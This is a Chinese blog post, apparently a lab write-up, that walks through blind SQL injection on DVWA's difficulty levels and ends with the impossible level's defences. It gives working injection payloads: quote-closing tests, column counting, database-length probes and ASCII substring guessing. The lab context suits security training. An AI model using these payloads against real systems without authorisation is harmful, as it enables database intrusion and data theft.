当前位置: 首页 > news >正文

dvwa8——SQL Injection(Blind)

news 2025/8/30 11:58:22

由题目得这一关用盲注写

LOW:

先用bp抓包一下 , 看到这low是get提交 , f12打开hackbar


输入?id=1'时报错

尝试闭合 , 回显正常

 开始注入

1.order by 判断列数,3的时候开始回显报错,所以有两列

?id=1' order by 2--+&Submit=Submit#

2.无回显位置可以爆出,我们通过盲注来继续爆数据

3.判断数据库长度

?id=1' and length(database())=3--+
?id=1' and length(database())=4--+

回显分别是

所以长度为4 

4.用ascii码逐字符猜库名,表名,列名

?id=1' and ascii(substr(database(),1,1))=100 --+

也可以参考这个,用python写个脚本,不再过多赘述 

sqli—labs第八关——布尔盲注_sqli-labs盲注脚本-CSDN博客

MEDIUM:

仍然用bp抓包,看到这一级是post

在f12hackbar里找表单的登录

格式按这个,  其余的盲注和low一样 

HIGH:

1' and 1=1#

输入这个的时候回显正常 

确定为但单引号字符型, 接下来和之前一样 

IMPOSSIBLE:

优化:

1.checktoken

2.is_numeric()函数验证输入是否为数字

3.pdo预处理

❀❀❀ 完结撒花!!! ❀❀❀

http://www.dtcms.com/a/230193.html

相关文章:

  • Hive开窗函数的进阶SQL案例
  • 使用PyQt5的图形用户界面(GUI)开发教程
  • 【hive sql】窗口函数
  • QT聊天项目DAY13
  • C# Wkhtmltopdf HTML转PDF碰到的问题
  • RDMA简介3之四种子协议对比
  • 图神经网络实战——图属性度量方法详解
  • 人机融合智能 | 可穿戴计算设备的多模态交互
  • java从azure中读取用户信息
  • 【Pandas】pandas DataFrame sample
  • 微软重磅发布Magentic UI,交互式AI Agent助手实测!
  • mybatis 参数绑定错误示范(1)
  • AWS DocumentDB vs MongoDB:数据库的技术抉择
  • PostgreSQL的扩展 pg_buffercache
  • 第5篇《中间件负载均衡与连接池管理机制设计》
  • 银行用户评分规则 深度学习
  • Linux容器篇、第一章_01Linux系统下 Docker 安装与镜像部署全攻略
  • 分布式爬虫代理IP使用技巧
  • C++性能优化指南
  • go的工具库:github.com/expr-lang/expr
  • 突破数据孤岛:StarRocks联邦查询实战指南
  • 【发布实录】云原生+AI,助力企业全球化业务创新
  • Java设计模式:责任链模式
  • Linux 特殊权限位详解:SetUID, SetGID, Sticky Bit
  • 数据结构第一章
  • 【RAG优化】rag整体优化建议
  • [ Qt ] | 与系统相关的操作(二):键盘、定时器、窗口移动和大小
  • 跟着deepseek浅学分布式事务(2) - 两阶段提交(2PC)
  • yum更换阿里云的镜像源
  • 保险丝选型